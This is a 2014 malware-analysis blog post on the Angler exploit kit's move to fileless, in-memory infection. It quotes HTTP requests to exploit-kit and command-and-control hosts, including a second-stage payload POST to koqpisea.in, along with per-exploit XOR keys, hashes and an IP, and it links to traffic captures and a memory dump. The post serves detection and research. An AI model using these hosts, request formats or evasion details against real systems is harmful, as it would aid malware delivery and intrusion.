2014-08-31 - Evolution

Angler EK : now capable of "fileless" infection (memory malware)

Matrix - Agent Jackson avoiding bullets



Few days ago I spotted a new pattern in some Angler EK threads :


New pattern in a Vawtrak Thread from Angler EK
Fired : CVE-2013-2551 - 2014-08-28


New pattern in another Vawtrak Thread from Angler EK
Fired : CVE-2014-0515 - 2014-08-29
GET http://rwvs30r2zq.akdnbfb .com/qpbv8tg4ee/count?b=1 HTTP/1.1
Accept: */*
Referer: http://rwvs30r2zq.akdnbfb .com/qpbv8tg4ee
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: rwvs30r2zq.akdnbfb.com
Connection: Keep-Alive



Wondering what it was and going over different infections paths I spotted only one thread without this "new" count?b.  [Note : on the 2014-08-31 count?b appeared on that thread too]

Angler EK - 2014-08-28
"Memory Malware" thread


Exploits' hashes were the same as on all other threads but my usual tools were not able to gather the payload and what surprised me more is that HIPS (like Faronics antiexec) were bypassed (note : I tried Malwarebytes AntiExploit and it was able to spot the ROP and Stack pivoting)
I spent some time to figure out what was happening here  :

Angler EK is now able to infect an host without writing the malware on the drive (it's injected directly in the process running the exploited plugin)

Angler EK (no landing on this screen, CVE-2014-0515 fired) and Call back from the malware injected in Internet Explorer
2nd Stage drop : 275c5f650261e80d864faf7cc6b70774 injecting itself to explorer and
then gathering Necurs on the same C&C (e.g. : be84c4689912d5689283b4b7efcaf8f2 - 2014-08-28 , b0e3e860a2dc62cb40fd6ef897ad592b 2014-08-29 , 5830dfde30873176d05604677bab6bd9 2014-08-30)


FileReplaceA "flood" operation

Malware call back in https to koqpisea.in :
217.23.3.204
49981 | 217.23.0.0/20 | WORLDSTREAM | NL | WORLDSTREAM.NL | WORLDSTREAM

Call for 2nd Stage payload looks like :

POST https://koqpisea.in/ HTTP/1.1
Host: koqpisea.in
Content-Length: 94
Connection: Keep-Alive
Cache-Control: no-cache

{"protocolVersion":1,"buildId":1049,"id":"35d1754a1c4672f2","tags":[{"type":"dll","64bit":0}]}


This feature opens a wide range of possibilities. Aside being a powerful way to bypass some AV, an ideal way for one time stealer or loader (Pony, Jolly Roger, Andromeda, Smoke Bot, etc..), it also allows a detailed check of the infected host before being a little more noisy and writing anything on disk. It makes it also difficult to grab the dropper (you have to get it from the memory or from the recorded traffic then decode it). This is a powerful move for the attack side.


Additional illustrations :

Injected plugin-container calling C&C after successful "memory malware" infection
via Silverlight on Firefox and Windows 7
2014-08-30



Image : Courtesy of Will Metcalf from Emerging Threats
Java calling payload then "Memory payload" activity captured by his Cuckoo instance
2014-08-28
<edit >

The encoded stream that is usually containing the Xored + shift byte malware is different in this configuration.

In Angler each exploit has its own Xor key :

Xor key in Angler  "fileless" thread CVE-2014-0515 stream 


CVE-2013-2551 = "adR2b4nh"
CVE-2014-0515 = "wT6QtySY"
CVE-2014-0322 = "laspfnfd"
Java = "FroSHu9h"
Silverlight = "aldonjfg"

The stream now starts with a Xored Shellcode (which has been spotted by EKWatcher as early as 2014-08-18 in thread fed by Adnxs (app Nexus) malvertising )

32 bits version of the stream after a XOR pass.
First part is a Shellcode.
Second part is a Dll
After a Xor and split operation (Disclaimer : it could be not enough to get the real DLL as Angler has an history of doing more than just a Xor)

Stream Shellcode 32bits
Xored MZ part : 32f4a876c1819713d13e1d14d8cb0a02

That encoded DLL is the same threat as the one called after infection (waiting for a proper name by AV). String spotted : C:\Remedies\And.pdb

 David Sanchez (Malwarebytes) figured out that the payload is hooking the kernel32!Exit!Process.
explaining why Iexplore was still loaded when browser was closed.

If the victim's OS is 64 bits then a 64bits shellcode and 64bits version of the dll is being sent :

Angler EK 2014-09-04 In bold Green :
- Encoded stream
- Same Distribution threat as the encoded one, downloaded from the C&C
- Asterope

Unamed Distribution bot (64bits variant) : 1b4cbec2a2d634ae257a760d43ba6bc5

It seems that the call back C&C  is operated by the Angler EK guys and is a kind of "Distribution botnet" (or loader in "Caas" mode)
</edit>

Credits: Thanks to Will Metcalf (Emerging Threats) and Mieke Verburgh (Malwarebytes) for help and advices.
Thanks to EkWatcher and David Sanchez (Malwarebytes) for informations and an insight on the "RE" side of this thread

Files:
 AnglerEK_MM_2014-08-31 (Fiddlers + bot + C&C calls - Owncloud)
 AnglerEK_MM_2014-09-05 (2addionnal fiddler, 64bits streams and C&C callback - Owncloud)

 If you want to play with Volatility or whatever, here is the memory (Mega) of a VM when IE was injected and calling C&C (IE pid : 860)

Capture of Fiddler just before pausing the VM
2014-08-30
<edit 2014-09-26>
</edit>


<edit 2014-09-29>

</edit>


Read More:  
The Hunt for Memory Malware - 2013-11-06 - Albert Fruz
In-Memory Execution of an Executable - Amit Malik  - SecurityXploded
A unique 'bodiless' bot attacks news site visitors - 2012-03-06 Segey Golovanov - Securelist